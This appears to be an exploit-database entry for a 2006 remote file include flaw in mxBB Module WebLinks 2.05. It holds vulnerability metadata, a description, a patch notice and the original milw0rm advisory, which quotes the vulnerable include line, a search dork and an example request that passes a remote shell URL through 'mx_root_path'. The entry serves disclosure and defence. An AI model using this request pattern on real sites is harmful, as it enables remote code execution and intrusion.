header-logo
Suggest Exploit
vendor:
mxBB Module WebLinks
by:
ajann
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: mxBB Module WebLinks
Affected Version From: 2.05
Affected Version To: 2.05
Patch Exists: Yes
Related CWE: N/A
CPE: a:mx_system:mxbb_module_weblinks
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

mxBB Module WebLinks <= 2.05(mx_root_path) Remote File Include Vulnerability

The vulnerability exists due to the improper validation of user-supplied input in the 'mx_root_path' parameter in the '/modules/mx_links/language/lang_english/lang_admin.php' script. A remote attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by passing a malicious URL in the 'mx_root_path' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

*******************************************************************************************
# Title   :  mxBB Module WebLinks <= 2.05(mx_root_path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.mx-system.com
# Dork    :  /modules/mx_links/

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
include_once( $mx_root_path .  'modules/mx_links/includes/mx_links_constants.php' );
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=[shell]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-16]